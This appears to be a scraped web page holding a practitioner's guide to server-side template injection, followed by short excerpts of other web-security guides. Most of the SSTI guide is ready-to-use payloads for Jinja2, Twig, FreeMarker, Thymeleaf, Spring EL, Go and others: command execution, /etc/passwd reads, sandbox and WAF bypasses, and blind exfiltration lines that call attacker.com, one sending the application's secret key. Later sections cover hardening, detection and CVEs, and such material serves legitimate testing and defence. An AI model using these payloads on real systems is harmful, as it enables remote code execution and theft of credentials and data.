if vulnerable Mathematical {​{7*7}} 49 if vulnerable Mathematical <%=7*7%> 49 if vulnerable String Concatenation ${'a'+'b'} ab if vulnerable Function Call ${T(java.lang.System).getProperty('user.name')} Username if Spring EL Go Detection {​{ . }} Memory address of passed object if Go template Handlebars Detection {​{this}} [object Object] if Handlebars FreeMarker String ${"Hello " + "World"} Hello World if FreeMarker FreeMarker Array ${["one", "two", "three"][1]} two if FreeMarker FreeMarker Length ${"test"?length} 4 if FreeMarker FreeMarker Date ${.now?string("yyyy-MM-dd")} Current date if FreeMarker Jelly (ServiceNow) <g:evaluate>gs.addErrorMessage(668.5*2);</g:evaluate> 1337 in error message Thymeleaf Inline [[${7*7}]] 49 if Thymeleaf expression inlining Template Engine Fingerprinting IDENTIFICATION DECISION TREE: ├── {​{7*7}} = 49 │ ├── {​{this}} = [object Object] → Handlebars (Node.js) │ ├── Jinja2 (Python) │ ├── Twig (PHP) │ └── Nunjucks (Node.js) ├── ${7*7} = 49 │ ├── ${"test"?length} = 4 → FreeMarker (Java) │ ├── ${T(java.lang.Runtime)} works → Spring EL (Java) │ └── Velocity (Java) ├── <%=7*7%> = 49 │ ├── ERB (Ruby) │ └── ASP Classic ├── {7*7} = 49 │ └── Smarty (PHP) ├── {​{ . }} = memory address │ └── Go html/template or text/template ├── [[${7*7}]] = 49 │ └── Thymeleaf (Java) expression inlining └── <g:evaluate>...</g:evaluate> executes └── Jelly (ServiceNow) Blind SSTI Detection Method Payload Example Verification Time-based (Jinja2) {​{''.__class__.__mro__[1].__subclasses__()[59].__init__.__globals__['os'].popen('sleep 10').read()}} Response delay Time-based (FreeMarker) <#assign ex="freemarker.template.utility.Execute"?new()>${ex("sleep 10")} Response delay DNS Exfiltration {​{''.__class__.__mro__[1].__subclasses__()[59].__init__.__globals__['os'].popen('nslookup x.attacker.com').read()}} DNS logs HTTP Callback Jinja2 urllib.request.urlopen to attacker URL HTTP logs 3. Template Engine Exploitation Jinja2 (Python) Exploitation Attack Vector Payload Impact Basic RCE {​{config.__class__.__init__.__globals__['os'].popen('id').read()}} Command execution Subprocess {​{''.__class__.__mro__[1].__subclasses__()[104].__init__.__globals__['sys'].modules['subprocess'].check_output('whoami',shell=True)}} Command execution File Read {​{''.__class__.__mro__[1].__subclasses__()[40]('/etc/passwd').read()}} File access Config Access {​{config.SECRET_KEY}} Sensitive data exposure Lipsum Shorthand {​{lipsum.__globals__}} Bypass length limits Cycler RCE {​{cycler.__init__.__globals__.os.popen('id').read()}} Shorter RCE payload Hex-encoded attr() {​{()|attr('\x5f\x5fclass\x5f\x5f')|attr('\x5f\x5fbase\x5f\x5f')|attr('\x5f\x5fsubclasses\x5f\x5f')()|attr('\x5f\x5fgetitem\x5f\x5f')(418)('id',shell=True,stdout=-1)|attr('communicate')()|attr('\x5f\x5fgetitem\x5f\x5f')(0)|attr('decode')('utf-8')}} Filter bypass RCE (CVE-2025-23211) Warning class import {​% for s in ().__class__.__base__.__subclasses__() %}{​% if "warning" in s.__name__ %}{​{s()._module.__builtins__['__import__']('os').popen("env").read()}}{​% endif %}{​% endfor %} RCE via warning subclass (Fides advisory) Twig (PHP) Exploitation TWIG ATTACK PATTERNS: ├── Filter Abuse │ ├── {​{_self.env.registerUndefinedFilterCallback("exec")}} │ ├── {​{_self.env.getFilter("id")}} │ └── {​{["id"]|filter("system")}} ├── Function Injection │ ├── {​{_self.env.registerUndefinedFunction("exec")}} │ └── {​{_self.env.getFunction("system")}} ├── Object Injection │ ├── {​{app.request.query.get('cmd')|passthru}} │ └── {​{dump(app)}} (information disclosure) └── Escape Handler Abuse (Grav CMS — GHSA-2m7x-c7px-hp58) ├── {​{ grav.twig.twig.extensions.core.setEscaper('system','twig_array_filter') }} └── {​{ ['id'] | escape('system', 'system') }} (Redefine escape function via setEscaper to system(), bypasses sandbox when not enabled) FreeMarker (Java) Exploitation Technique Payload Description Object Creation <#assign ex="freemarker.template.utility.Execute"?new()> ${ex("id")} Command execution Static Method Call ${"freemarker.template.utility.ObjectConstructor"?new()("java.lang.ProcessBuilder","id").start()} Process creation File System Access <#assign fos=freemarker.template.utility.ObjectConstructor("java.io.FileOutputStream","/tmp/test")> File manipulation ?lower_abc Filter Bypass ${(6?lower_abc+18?lower_abc+...)?new()(9?lower_abc+4?lower_abc)} Reconstruct “freemarker.template.utility.Execute” char-by-char to bypass keyword blocklists CamelContext Sandbox Escape <#assign cr=camelContext.getClassResolver()><#assign i=camelContext.getInjector()><#assign se=i.newInstance(cr.resolveClass('javax.script.ScriptEngineManager'))>${se.getEngineByName("js").eval("...")} RCE even with ClassResolver sandbox enabled (Apache Camel) CamelContext Language $camelContext.resolveLanguage("groovy").createExpression(<PAYLOAD>).evaluate(exchange, Object.class) Groovy expression via Camel context Alfresco Sandbox Bypass Exploit exposed objects in FreeMarker templates to bypass restrictions (CVE-2023-49964, incomplete fix for CVE-2020-12873) RCE in Alfresco CMS Handlebars (Node.js) Exploitation Technique Payload Description Prototype Pollution + AST Injection Pollute Object.prototype.type = 'Program' and Object.prototype.body with crafted AST containing RCE in NumberLiteral value Bypass parser validation, inject code directly into compiler Constructor Chain `{​{#with “s” as string toString Override + bind() Override Object.prototype.toString via defineProperty, use bind() to create function returning attacker payload, then invoke via Function constructor Full RCE without scope-defined functions (Shopify Return Magic) pendingContent Detection Pollute Object.prototype.pendingContent with test string Detect Handlebars engine in black-box with prototype pollution Pug (Node.js) Exploitation Technique Payload Description AST Injection via block Pollute Object.prototype.block = {"type":"Text","val":"<script>alert(origin)</script>"} XSS/content injection via prototype pollution Code Injection via line Pollute Object.prototype.block.type = "Code" with body containing RCE payload Command execution via AST manipulation Thymeleaf (Java) Exploitation THYMELEAF ATTACK PATTERNS: ├── Expression Preprocessing Double-Eval │ ├── __${path}__ preprocesses user input, result evaluated as expression │ ├── URL path injection: http://target/(${T(java.lang.Runtime).getRuntime().exec('calc')}) │ └── Works on Jetty (allows {} in path), blocked on Tomcat (URL-encodes {}) ├── Spring Boot 3.3.4 Denylist Bypass (modzero research) │ ├── Thymeleaf blocks T() for static class access and org.springframework.util.ReflectionUtils │ ├── Bypass via org.apache.commons.lang3.reflect.MethodUtils (not on denylist) │ ├── "".class.forName("org.apache.commons.lang3.reflect.MethodUtils") │ │ .invokeMethod( │ │ "".class.forName("org.apache.commons.lang3.reflect.MethodUtils") │ │ .invokeStaticMethod("".class.forName("java.lang.Runtime"),"getRuntime"), │ │ "exec", "whoami") │ └── Full payload reads command output via IOUtils + file write for non-blind RCE ├── CVE-2023-38286 (Spring Boot Admin) │ ├── Bypass Thymeleaf blacklists via ReflectionUtils (older versions) │ ├── th:with chaining: findMethod → invokeMethod → exec │ └── Requires MailNotifier enabled + write access to env vars └── CVE-2022-46166 (Spring Boot Admin) └── RCE via variable coverage in notification templates Velocity (Java) Exploitation Technique Payload Description CamelContext RCE ${camelContext.class.forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("...")} RCE via JavaScript engine in Apache Camel Template Override Send CamelVelocityTemplate header to override default template Dynamic template injection via message headers Resource URI Override Send CamelVelocityResourceUri header pointing to file:///etc/passwd Arbitrary file disclosure MVEL (Java) Exploitation Technique Payload Description Direct RCE @{java.lang.Runtime.getRuntime().exec('id')} Direct runtime access ObjectFactory RCE @{com.sun.org.apache.xerces.internal.utils.ObjectFactory.newInstance("javax.script.ScriptEngineManager",null,false).getEngineByName('js').eval("...")} Via ScriptEngine Template Override Send CamelMvelTemplate header Apache Camel dynamic template Go Template Exploitation GO SSTI ATTACK PATTERNS: ├── Detection │ └── {​{ . }} — prints memory address/object dump of passed struct ├── Data Leakage │ ├── {​{ .Email }} / {​{ .Password }} — access struct fields │ └── Leaks any exported field on the passed object ├── Method Invocation │ ├── {​{ .MethodName "arg" }} — call exported methods on passed struct │ └── Methods must be exported (capitalized) to be callable ├── Gin Framework Gadgets │ └── {​{ .Writer.WriteString "<script>alert(1)</script>" }} — XSS via response writer ├── Echo Framework Gadgets │ ├── {​{ .File "/etc/passwd" }} — arbitrary file read │ ├── {​{ .Attachment "/etc/passwd" "passwd" }} — file read via attachment │ ├── {​{ .Inline "/etc/passwd" "passwd" }} — file read inline │ └── {​{ $x:=.Echo.Filesystem.Open "/etc/hostname" }} {​{ $x.Seek 1 0 }} {​{ .Stream 200 "text/plain" $x }} — file read with I/O control ├── Fiber Framework Gadgets │ ├── {​{ .App.Shutdown }} — denial of service │ └── {​{ .Response.SendFile "/etc/hostname" }} {​{ .Response.Body }} — file read via fasthttp.Response ├── Method Confusion (OnSecurity Research) │ ├── If passed object type matches a method's receiver, call with custom params │ ├── echo.Context.File("path") gadget for arbitrary file read │ └── Gadget hunting: search imported modules for exported methods with dangerous behavior └── text/template vs html/template ├── text/template allows direct "call" for public functions — higher risk └── html/template restricts call — requires gadget chains Jelly (ServiceNow) Exploitation Technique Payload Description Template Injection Probe <g:evaluate>gs.addErrorMessage(668.5*2);</g:evaluate> Confirm injection via math result (1337) in error message DB Credential Theft Inject <g:evaluate> to read glide.db.properties via SecurelyAccess + getBufferedReader() Extract database connection strings Chained Exploitation CVE-2024-4879 (title injection) + CVE-2024-5217 (mitigation bypass) + CVE-2024-5178 (file filter bypass) Full RCE chain on ServiceNow Style Tag Bypass Embed Jelly tags inside <style> element in jvar_page_title parameter Bypass basic input validation 4. Framework-Specific Attacks Spring Framework (Java) Context Payload Impact Spring EL ${T(java.lang.Runtime).getRuntime().exec('id')} RCE SpEL Injection #{T(java.lang.System).getProperty('user.name')} Information disclosure Request Context ${@requestMappingHandlerMapping.getApplicationContext().getEnvironment().getProperty('java.version')} Environment access Thymeleaf Double-Eval '+${7*7}+' in Referer header with __${Referer}__ preprocessing RCE via preprocessing (modzero) MethodUtils Bypass "".class.forName("org.apache.commons.lang3.reflect.MethodUtils").invokeStaticMethod(...) Bypass Thymeleaf denylist in Spring Boot 3.3.4+ WebAsyncManager Header Exfil Access #ctx.getVariable("...WebAsyncManager...") to read request headers and write response Non-blind RCE without outbound connections Django (Python) DJANGO TEMPLATE ATTACKS: ├── Debug Information │ ├── {​{settings.SECRET_KEY}} │ ├── {​{settings.DATABASES}} │ └── {​{settings.DEBUG}} ├── Object Traversal │ ├── {​{request.META}} │ ├── {​{request.user}} │ └── {​{request.session}} └── Filter Abuse ├── Custom filters with dangerous functions └── Template tag injection Laravel (PHP) Attack Type Payload Result Blade RCE @php(system('id')) @endphp Command execution Variable Access {​{$app->make('config')->get('database.default')}} Configuration disclosure Helper Function {​{app('Illuminate\Contracts\Console\Kernel')->call('route:list')}} Application introspection Apache Camel (Java) APACHE CAMEL SSTI (CVE-2020-11994): ├── Affected Components │ ├── camel-freemarker (CamelFreemarkerTemplate header) │ ├── camel-velocity (CamelVelocityTemplate header) │ ├── camel-mvel (CamelMvelTemplate header) │ └── camel-mustache (MustacheResourceUri header — file disclosure only) ├── Attack Pattern │ ├── Override default template via message header injection │ ├── Header source depends on consumer: JMS properties, HTTP headers, etc. │ └── ResourceUri headers enable arbitrary file disclosure (file:///etc/passwd) ├── Sandbox Bypass │ ├── camelContext object exposed in template context │ ├── getInjector() + getClassResolver() → instantiate arbitrary classes │ └── resolveLanguage("groovy") → evaluate arbitrary Groovy expressions └── Impact └── RCE + Arbitrary File Disclosure across all template components Grav CMS (PHP/Twig) Attack Type Payload Result setEscaper Abuse {​{ grav.twig.twig.extensions.core.setEscaper('system','twig_array_filter') }} then {​{ ['id'] | escape('system', 'system') }} RCE by redefining escape filter to system() Root Cause Twig sandbox not enabled; unrestricted access to extension classes via template context Arbitrary callable registration 5. Payload Development Payload Construction Strategy PAYLOAD DEVELOPMENT PROCESS: ├── Environment Discovery │ ├── Available classes/modules │ ├── Security restrictions │ └── Execution context ├── Bypass Development │ ├── Filter evasion │ ├── Character restrictions │ └── Length limitations ├── Payload Optimization │ ├── Minimize detection │ ├── Maximize impact │ └── Ensure reliability └── Multi-Stage Delivery ├── Store payload in persistent objects (Jinja2 config object) ├── Retrieve and execute across separate requests └── Useful when injection point has size limits (email fields) Common Payload Patterns Goal Python/Jinja2 PHP/Twig Java/FreeMarker Node.js/Handlebars Go List Classes {​{''.__class__.__mro__[1].__subclasses__()}} {​{dump()}} <#list .data_model?keys as key>${key}</#list> {​{this}} {​{ . }} Execute Command {​{cycler.__init__.__globals__.os.popen('id').read()}} {​{_self.env.registerUndefinedFilterCallback("system")}} <#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")} Prototype pollution + AST injection N/A (gadget-dependent) Read File {​{get_flashed_messages.__globals__['current_app'].open_resource('../../../etc/passwd').read()}} {​{include('/etc/passwd')}} <#assign file=...ObjectConstructor("java.io.File","/etc/passwd")> N/A {​{ .File "/etc/passwd" }} (Echo) Size-Limited Payload Technique (Jinja2) MULTI-REQUEST PAYLOAD STAGING: 1. Store payload in config object via short injection: {​{config.update(a=request.args.get('a'))}} with URL parameter: ?a=<long RCE payload> 2. Verify storage: {​{config.a}} 3. Execute stored payload: {​{''.__class__.__mro__[1].__subclasses__()...__globals__['os'].popen(config.a).read()}} Use case: SSTI in email fields with RFC-imposed size limits 6. Advanced Exploitation Blind SSTI Exploitation Detection Method Payload Verification Time-based {​{''.__class__.__mro__[1].__subclasses__()[59].__init__.__globals__['time'].sleep(5)}} Response delay DNS Exfiltration {​{''.__class__.__mro__[1].__subclasses__()[59].__init__.__globals__['os'].popen('nslookup whoami.attacker.com').read()}} DNS logs HTTP Callback {​{''.__class__.__mro__[1].__subclasses__()[59].__init__.__globals__['urllib'].request.urlopen('http://attacker.com/'+config.SECRET_KEY)}} HTTP logs Sandbox Escape Techniques SANDBOX BYPASS METHODS: ├── Python/Jinja2 │ ├── __builtins__ access via globals │ ├── Class traversal to dangerous modules │ ├── Import statement reconstruction │ └── Warning subclass → __builtins__['__import__'] chain ├── Java/FreeMarker │ ├── ObjectConstructor for arbitrary class instantiation │ ├── Static method calls via ?new() │ ├── Reflection API abuse │ ├── CamelContext.getInjector() + getClassResolver() (Apache Camel) │ └── ScriptEngineManager for Groovy/JavaScript eval ├── Java/Thymeleaf │ ├── Expression preprocessing (__...__) double-evaluation │ ├── org.apache.commons.lang3.reflect.MethodUtils (bypass Spring Boot 3.3.4 denylist) │ ├── "".class.forName() to load arbitrary classes │ └── ReflectionUtils (older versions, now denylisted) ├── PHP/Twig │ ├── Filter/function registration │ ├── Object property access │ ├── Include/eval function calls │ └── setEscaper() to redefine escape function as system() (Grav CMS) └── Node.js/Handlebars ├── AST Injection via prototype pollution (bypass parser entirely) ├── Function constructor via this.constructor.constructor ├── Object.prototype.toString override + bind() for RCE └── Built-in helper abuse (with, blockHelperMissing) Prototype Pollution to SSTI (Node.js) PROTOTYPE POLLUTION → SSTI CHAIN: ├── Handlebars │ ├── Pollute Object.prototype.type = "Program" │ ├── Pollute Object.prototype.body with AST containing RCE in NumberLiteral.value │ ├── Template string bypasses parser (treated as pre-parsed AST) │ └── Compiler executes injected code directly ├── Pug │ ├── Pollute Object.prototype.block with {type:"Text", val:"<payload>"} │ ├── When ast.type is "While", walkAST follows ast.block (uses prototype) │ └── High reliability: any template referencing arguments triggers it └── Detection ├── Handlebars: Object.prototype.pendingContent = "<test>" → appears in output └── Pug: Object.prototype.block = {type:"Text", val:"<test>"} → appears in output 7. Bypass Techniques Filter Evasion Restriction Bypass Technique Example Keyword Blacklist String concatenation {​{'sy'+'stem'}} Character Filtering Unicode/Encoding {​{'\u0073\u0079\u0073\u0074\u0065\u006d'}} Length Limits Shortened payloads {​{lipsum.__globals__}} Quotes Blocked String methods {​{request.args.cmd|system}} Keyword Blacklist (FreeMarker) ?lower_abc encoding 6?lower_abc = “f”, reconstruct class names char-by-char Attribute Name Filtering Hex-encoded attr() |attr('\x5f\x5fclass\x5f\x5f') instead of .__class__ Size Limit Config object staging Store payload in config.a via one request, execute in another Thymeleaf Static Class Block commons-lang3 MethodUtils Use "".class.forName(...) to load non-denylisted reflection class ServiceNow Mitigation Style tag wrapper + Jelly xmlns Embed <g:evaluate> inside <style> tags WAF Bypass Strategies WAF EVASION TECHNIQUES: ├── Encoding Variations │ ├── URL encoding (%7B%7B) │ ├── Unicode encoding (\u007B\u007B) │ └── HTML entity encoding (&lbrace;&lbrace;) ├── Structure Manipulation │ ├── Whitespace insertion {​{ 7*7 }} │ ├── Comment insertion {# comment #} │ └── Nested expressions {​{7*{​{7}}}} ├── Payload Fragmentation │ ├── Multi-step injection │ ├── Context-dependent payloads │ └── Request splitting ├── FreeMarker-Specific │ ├── ?lower_abc / ?upper_abc character reconstruction │ ├── 1.1?c[1] to generate dot character │ └── Numeric built-in abuse to construct arbitrary strings └── Thymeleaf-Specific ├── Preprocessor double-evaluation via __${...}__ ├── @{} link expression parentheses to clear context └── Server-specific: Jetty allows {} in URL path, Tomcat blocks 8. Testing Methodology Manual Testing Workflow Phase Activities Tools/Techniques Discovery Input point identification Burp Suite, manual analysis Detection Template injection testing Mathematical expressions, error analysis Identification Template engine fingerprinting Specific syntax testing, decision tree Exploitation Payload development Engine documentation, trial and error Impact Assessment Privilege escalation, data access Full exploitation chains Blind Validation Time-based and OOB testing sleep commands, DNS/HTTP callbacks Automated Testing Tools SSTI TESTING ARSENAL: ├── Detection Tools │ ├── tplmap (comprehensive scanner — epinna) │ ├── SSTImap (exploitation framework — vladko312) │ ├── Burp extensions (various) │ └── Nuclei templates (e.g., CVE-2024-5217.yaml) ├── Payload Generators │ ├── PayloadsAllTheThings (payload collection) │ ├── SecLists (template payloads) │ └── Custom scripts ├── Framework-Specific │ ├── j2eeTester (Java templates) │ ├── TwigSecurityChecker (Twig) │ └── JinjaSecurityScanner (Jinja2) ├── Reconnaissance │ ├── Shodan/Censys/FOFA (identify exposed instances, e.g., ServiceNow) │ └── Nuclei for automated version/vulnerability probing └── CI/CD Integration ├── SAST rules: flag {​{{ in .hbs files (Handlebars triple braces) ├── Secrets scanners: detect credentials in templates └── Build guardrails: break on unsafe patterns 9. Secure Implementation Secure Template Design Principles Principle Implementation Security Benefit Input Validation Strict allowlist validation Prevents injection Context Isolation Separate template contexts Limits impact Minimal Privileges Restricted template capabilities Reduces attack surface Output Encoding Automatic encoding Prevents XSS Sandbox Enforcement Enable template engine sandbox mode Limits exploitation scope Least Privilege Containers Run containers as non-root Limits post-exploitation impact (CVE-2025-23211) Framework-Specific Security SECURE CONFIGURATION: ├── Jinja2/Django │ ├── autoescape=True (XSS prevention) │ ├── Restrict dangerous globals │ ├── Custom filter validation │ └── Use SandboxedEnvironment for user-controlled templates ├── Twig/Symfony │ ├── Strict mode enabled │ ├── Sandbox mode for user content (prevents setEscaper abuse) │ ├── Function/filter allowlisting │ └── Block access to internal extension objects ├── FreeMarker/Spring │ ├── Restricted method calls │ ├── Template loading restrictions │ ├── API access controls │ └── Use TemplateClassResolver.ALLOWS_NOTHING_RESOLVER ├── Thymeleaf/Spring Boot │ ├── Avoid expression preprocessing (__...__) with user input │ ├── Denylist covers java.*, javax.*, org.springframework.util.* │ ├── Audit third-party libs (commons-lang3 MethodUtils still exploitable) │ └── Prefer Tomcat over Jetty (Tomcat blocks {} in URL paths) ├── Handlebars/Node.js │ ├── Always use double braces {​{ }} (auto-escaping), never triple {​{{ }}} │ ├── Audit custom helpers — never use SafeString with user input │ ├── Protect against prototype pollution (freeze Object.prototype, use Maps) │ └── Keep dependencies updated (prototype pollution CVEs) ├── Go Templates │ ├── Prefer html/template over text/template (restricts "call") │ ├── Never pass entire framework context (gin.Context, echo.Context) to templates │ ├── Create minimal view structs with only needed fields │ └── Avoid exported methods with dangerous behavior on passed types ├── ServiceNow/Jelly │ ├── Apply vendor patches promptly (CVE-2024-4879 exploited in wild) │ ├── Sanitize jvar_page_title and similar parameters │ └── Monitor for Jelly tag injection patterns in logs └── General Practices ├── Pre-compile templates (never build from user strings) ├── Validate all inputs ├── Monitor template rendering └── Run applications as non-root in containers 10. Detection & Prevention Runtime Protection Control Implementation Effectiveness Input Sanitization Remove template syntax High (if comprehensive) Template Sandboxing Restricted execution environment Medium (bypass possible) Content Security Policy Restrict dynamic content Low (server-side attack) Web Application Firewall Pattern-based blocking Medium (bypass common) Prototype Pollution Prevention Object.freeze, Map usage, input validation High (prevents AST injection in Node.js) Monitoring & Detection DETECTION STRATEGIES: ├── Log Analysis │ ├── Template rendering errors │ ├── Unusual template patterns ({​{, ${, <#, <g:evaluate>) │ ├── Performance anomalies │ └── ServiceNow: monitor login.do for Jelly tag injection ├── Runtime Monitoring │ ├── Template execution time (detect sleep-based blind SSTI) │ ├── Memory consumption │ ├── System call monitoring (exec, popen, ProcessBuilder) │ └── DNS/HTTP outbound connections from template rendering ├── Security Scanning │ ├── Regular SAST scans (CodeQL, Semgrep) │ ├── DAST testing (tplmap, SSTImap, Nuclei) │ ├── Dependency vulnerability checks (prototype pollution in Node.js) │ └── Internet exposure scanning (Shodan, Censys, FOFA) └── Supply Chain ├── Monitor npm advisories for Handlebars, Pug, flat ├── Track Java dependency updates (FreeMarker, Thymeleaf, commons-lang3) └── Automated SCA in CI/CD pipelines Incident Response Phase Actions Considerations Detection Log analysis, alert investigation False positive filtering Containment Template access restriction Service availability Eradication Vulnerable template removal Code deployment Recovery Secure template implementation Testing requirements Lessons Learned Process improvement Training needs 11. CVE Reference CVE Product Engine CVSS Impact CVE-2024-4879 ServiceNow Jelly 9.3 Unauthenticated RCE via title injection CVE-2024-5217 ServiceNow Jelly 9.2 Template injection mitigation bypass CVE-2024-5178 ServiceNow Jelly 6.9 Filesystem filter bypass, sensitive file read CVE-2026-5760 SGLang Template Engine 9.8 RCE via malicious GGUF model files CVE-2025-61620 AI Model Platform Jinja2 8.5 Template injection in model configuration CVE-2025-23211 Tandoor Recipes Jinja2 9.9 Authenticated SSTI to root RCE in Docker CVE-2023-38286 Spring Boot Admin Thymeleaf – RCE via Thymeleaf blacklist bypass CVE-2022-46166 Spring Boot Admin Thymeleaf – RCE via variable coverage in notifiers CVE-2023-49964 Alfresco FreeMarker – SSTI sandbox bypass (incomplete fix of CVE-2020-12873) CVE-2020-12873 Alfresco FreeMarker – Original SSTI via exposed FreeMarker objects CVE-2020-11994 Apache Camel FreeMarker/Velocity/MVEL/Mustache – RCE + file disclosure via template header override CVE-2024-29178 Apache StreamPark FreeMarker – FreeMarker SSTI to RCE CVE-2019-20920 Handlebars (npm) Handlebars – Prototype pollution leading to RCE GHSA-2m7x-c7px-hp58 Grav CMS Twig – RCE via setEscaper() without sandbox GHSA-c34r-238x-f7qx Fides Jinja2 – RCE via unsandboxed email template rendering Key Takeaways Input Validation: Never trust user input in template contexts Template Isolation: Separate user-controlled and system templates Minimal Privileges: Restrict template engine capabilities Regular Testing: Include SSTI in security testing processes Framework Updates: Keep template engines updated with security patches Sandbox Enforcement: Always enable sandbox mode when user content is rendered by template engines Prototype Pollution Awareness: In Node.js, prototype pollution can chain to full SSTI/RCE even in “logicless” engines like Handlebars Context Minimization: Pass only minimal data structures to templates — never entire framework contexts (Go, Spring) Container Hardening: Run applications as non-root to limit post-exploitation impact Supply Chain Monitoring: Track template engine dependency vulnerabilities in CI/CD This guide compiles practical SSTI knowledge from 40 research sources. Template injection vulnerabilities remain common due to the complexity of modern template engines and their powerful features. The attack surface extends beyond traditional web frameworks to message-driven architectures (Apache Camel), CMS platforms (Alfresco, Grav), enterprise IT management (ServiceNow), and Node.js prototype pollution chains.

Comprehensive Session Management Security Guide 🆕 Enhanced May 2, 2026 - Updated with session CVEs and management techniques including cookie security flaws, token vulnerabilities, and modern session attack vectors. A practitioner’s reference for session management security — session attacks, cookie security, token vulnerabilities, exploitation techniques, and defense strategies. Covers traditional and modern session management from web applications to APIs. 🔥 Latest Update: May 2, 2026 - Enhanced with 2026 critical session CVEs including CVE-2026-5707 (AWS RES Root RCE), CVE-2025-55315 (ASP.NET Core), CVE-2025-24813 (Apache Tomcat) covering cloud and enterprise session vulnerabilities. ...

Comprehensive Business Logic Flaws Guide A practitioner’s reference for business logic vulnerabilities — workflow bypass, race conditions, payment logic flaws, privilege escalation chains, and application context attacks. Enhanced with 2026 critical CVEs from 339 research insights across 27 CVE discoveries. 🆕 Newly Created: May 2, 2026 - Complete new guide built from 339 automated insights covering workflow bypass, race conditions, payment logic, and attack chains with 27 critical CVEs from comprehensive security research analysis. ...

I’ve been hunting access control bugs for over a decade, and let me tell you - they’re everywhere. When OWASP moved broken access control to #1 in 2025 and merged SSRF into this category, I wasn’t surprised. I was relieved that the security community finally caught up to what I’ve been seeing in the wild. 94% of applications tested have broken access control issues. That’s not a typo - it’s a security apocalypse hiding in plain sight. ...

I’ve been working with the OWASP Top 10 for years, and the 2025 update just dropped some major changes that every developer needs to understand. Supply chain attacks finally made it into the top 10 (as A03), and honestly, it’s about time. I’ve been seeing these attacks destroy companies for the past few years. Here’s the thing about OWASP Top 10 2025: it’s not just updating the old list - it’s completely rethinking modern threats. Security misconfiguration jumped from #5 to #2, and they merged SSRF into broken access control because that’s how attackers actually chain these vulnerabilities together. ...

I’ve been hunting SSRF bugs in Python applications for over five years, and the number of vulnerable codebases I encounter is honestly terrifying. Flask apps with requests.get(user_input) scattered everywhere. Django views that blindly fetch URLs from form data. FastAPI endpoints that turn your server into an attacker’s proxy. The worst part? Most developers don’t realize they’re building SSRF vulnerabilities until it’s too late. By then, attackers have already stolen your AWS credentials or mapped your entire internal network. ...

CSRF and SSRF sound like they’re related - they both have “request forgery” in the name, after all. But they’re completely different beasts that’ll bite you in completely different ways. I’ve spent way too many nights debugging both of these vulnerabilities, and the confusion between them has cost teams serious security incidents. Let me break down exactly what each one does and how to stop them before they wreck your app. ...

HTTP Request Smuggling (HRS) is a powerful web application vulnerability that exploits discrepancies in how different servers or intermediaries parse and handle HTTP requests. This misalignment can allow an attacker to “smuggle” a malicious request through a front-end server (such as a load balancer, proxy, or CDN) so that it is interpreted differently by the back-end server. How HTTP Request Smuggling Works Modern web applications often rely on chains of intermediaries — proxies, reverse proxies, CDNs, and application servers. These components must all agree on where one HTTP request ends and the next begins. If they disagree, attackers can craft specially malformed requests that cause desynchronization. ...

Content Security Policy (CSP) is a browser security mechanism that controls which resources a web page is allowed to load. By declaring a policy via HTTP header, you tell the browser exactly which scripts, styles, images, fonts, and connections are permitted. Anything not explicitly allowed is blocked. CSP is one of the most effective defenses against Cross-Site Scripting (XSS) and data injection attacks. How CSP Works CSP is delivered as an HTTP response header: ...